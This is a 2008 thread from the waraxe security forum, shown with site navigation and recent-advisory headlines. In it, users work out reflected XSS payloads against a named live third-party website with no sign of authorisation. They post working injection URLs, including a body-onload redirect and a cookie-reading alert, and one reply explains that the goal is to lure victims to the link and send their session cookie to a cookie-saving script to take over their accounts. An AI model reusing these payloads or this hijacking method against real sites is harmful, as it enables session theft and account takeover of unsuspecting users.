Waraxe IT Security Portal
Login or Register
September 9, 2026
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 839
Members: 0
Total: 839
Full disclosure
[0day-rubbish] Royal Server 5.04.50529.0 Local privilege escalation to LocalSystem on the execution path without credential override (7.2)
[0day-rubbish] core-admin 1.0.164 (build 16468) Systemic shell command injection via ineffective quote escaping (8.8)
[0day-rubbish] OP5 Monitor 9.20 Command injection surviving the CVE-2025-34115 patch (OPT-IN fix ineffective) (8.8)
[0day-rubbish] QuantaStor 6.8.3.018 Command injection in the alert-mail command via the smtpPassword field (8.8)
[0day-rubbish] SmarterMail 100.0.9693 (Build 9693) Antivirus command-line configuration executing as NT AUTHORITY\SYSTEM (7.2)
[0day-rubbish] Jitterbit Agent 12.8.1.6 (Docker jitterbit/agent:12.8.1.6) Unauthenticated SOAP with hard-coded credentials leading to OS command execution (9.8)
[0day-rubbish] Accurate Online Private Cloud on-prem (current) Unauthenticated Hessian deserialization leading to JNDI remote class loading (9.8)
[0day-rubbish] DBxtra .NET 13.1.1.0 Unauthenticated SOAP API to xp_cmdshell code execution (9.8)
**Subject:** CVE-2026-2035703: Tozed ZLT X300 5G CPE — Unauthenticated Remote Root Code Execution via TR-069 Command Injection (CVSS 9.8)
CVE-2026-52307: Stored XSS in 1CMS v5.6
HP Easy Start for macOS: CVE-2026-12554 / CVE-2026-12555 /CVE-2026-12556
Next.js 16.4.0-canary.13 Image Optimizer DNS Rebinding TOCTOU SSRF Still Exists
O-CMS 1.0.0 Authenticated OS Command Injection viaai_cli_script
Flextype v1.0.0-alpha.3 CMS registerShortcodes() Remote Code Execution via Attacker-Controlled File Inclusion
Flextype v1.0.0-alpha.3 Stored Fetch Shortcode Allows Server-Side Request Forgery
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cross-site scripting aka XSS -> XSS
Post new topicReply to topic View previous topic :: View next topic
XSS
PostPosted: Thu Jun 19, 2008 4:31 pm Reply with quote
Xelion
Regular user
Regular user
Joined: Jun 13, 2008
Posts: 15




Hi,
At this website : http://www.startimes2.com

I found this loophole :
Quote:
http://www.startimes2.com/f.aspx?style=lol">lol<lol lol="


But if I do :
Quote:
http://www.startimes2.com/f.aspx?style=lol"><script>alert(document.cookies);</script><lol lol="

I have a blank page :s
View user's profile Send private message Visit poster's website
PostPosted: Fri Jun 20, 2008 12:57 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




It's document.cookie

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Fri Jun 20, 2008 9:25 am Reply with quote
Xelion
Regular user
Regular user
Joined: Jun 13, 2008
Posts: 15




Quote:
http://www.startimes2.com/f.aspx?style=lol%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3Clol%20lol=%22

Is blank too :s[/code]
View user's profile Send private message Visit poster's website
PostPosted: Fri Jun 20, 2008 9:33 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




mod_security anti-XSS measures maybe?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Jun 20, 2008 9:53 am Reply with quote
Xelion
Regular user
Regular user
Joined: Jun 13, 2008
Posts: 15




I don't know :s
View user's profile Send private message Visit poster's website
PostPosted: Fri Jun 20, 2008 10:01 am Reply with quote
Xelion
Regular user
Regular user
Joined: Jun 13, 2008
Posts: 15




Quote:
http://www.startimes2.com/f.aspx?style=blue%22;t=document;alert(t.cookie);%22

I have the cookie, how to use it ?
View user's profile Send private message Visit poster's website
PostPosted: Fri Jun 20, 2008 10:07 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Try this tests:

Code:


f.aspx?style=lol"><body onload="alert(123);"><lol lol=
f.aspx?style=lol"><body onload="document.location='http://www.yahoo.com'"><lol lol=



//Edit - corrected coding mistake //


Last edited by waraxe on Sun Jun 22, 2008 1:08 am; edited 1 time in total
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Jun 20, 2008 10:17 am Reply with quote
Xelion
Regular user
Regular user
Joined: Jun 13, 2008
Posts: 15




f.aspx?style=lol"><body onload="alert(123);"><lol lol= >> I have the alert "123"

f.aspx?style=lol"><body onload="document.location='http://www.yahoo.com'"><lol lol= >> i have a blank page

Now, I want to know how to use : http://www.startimes2.com/f.aspx?style=blue%22;t=document;alert(t.cookie);%22
View user's profile Send private message Visit poster's website
PostPosted: Sun Jun 22, 2008 12:55 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




XSS is all about tricking people into following your link so you get their session cookie and can access their account. There must be tutorials out there but you basically need to redirect the user to your cookie saving script.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
XSS
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.032 Seconds